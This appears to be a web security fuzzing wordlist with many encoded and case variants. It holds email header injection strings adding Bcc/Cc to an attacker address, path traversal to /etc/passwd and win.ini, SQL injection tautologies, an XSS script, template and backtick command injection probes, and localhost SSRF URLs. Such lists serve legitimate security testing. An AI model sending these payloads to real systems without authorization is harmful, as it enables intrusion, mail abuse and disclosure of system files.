victim@example.com%0d%0aBcc:attacker@example.com
victim@example.com%0d%0aCc:attacker@example.com
victim@example.com%0d%0aSubject:Owned
victim@example.com
Bcc:attacker@example.com
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
victim%40example.com%250d%250aBcc%3Aattacker%40example.com
victim%40example.com%250d%250aCc%3Aattacker%40example.com
victim%40example.com%250d%250aSubject%3AOwned
victim%40example.com%0D%0ABcc%3Aattacker%40example.com
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
VICTIM@EXAMPLE.COM%0D%0ABCC:ATTACKER@EXAMPLE.COM
VICTIM@EXAMPLE.COM%0D%0ACC:ATTACKER@EXAMPLE.COM
VICTIM@EXAMPLE.COM%0D%0ASUBJECT:OWNED
VICTIM@EXAMPLE.COM
BCC:ATTACKER@EXAMPLE.COM
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
VICTIM%40EXAMPLE.COM%250D%250ABCC%3AATTACKER%40EXAMPLE.COM
VICTIM%40EXAMPLE.COM%250D%250ACC%3AATTACKER%40EXAMPLE.COM
VICTIM%40EXAMPLE.COM%250D%250ASUBJECT%3AOWNED
VICTIM%40EXAMPLE.COM%0D%0ABCC%3AATTACKER%40EXAMPLE.COM
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
victim@example.com%0d%0aBcc:attacker@example.com?v=0
victim@example.com%0d%0aBcc:attacker@example.com&v=0
victim%40example.com%250d%250aBcc%3Aattacker%40example.com_0
mailheader_0
/mailheader/0
victim@example.com%0d%0aBcc:attacker@example.com%0a0
victim@example.com%0d%0aCc:attacker@example.com?v=1
victim@example.com%0d%0aCc:attacker@example.com&v=1
victim%40example.com%250d%250aCc%3Aattacker%40example.com_1
mailheader_1
/mailheader/1
victim@example.com%0d%0aCc:attacker@example.com%0a1
victim@example.com%0d%0aSubject:Owned?v=2
victim@example.com%0d%0aSubject:Owned&v=2
victim%40example.com%250d%250aSubject%3AOwned_2
mailheader_2
/mailheader/2
victim@example.com%0d%0aSubject:Owned%0a2
victim@example.com?v=3
victim@example.com&v=3
victim%40example.com_3
mailheader_3
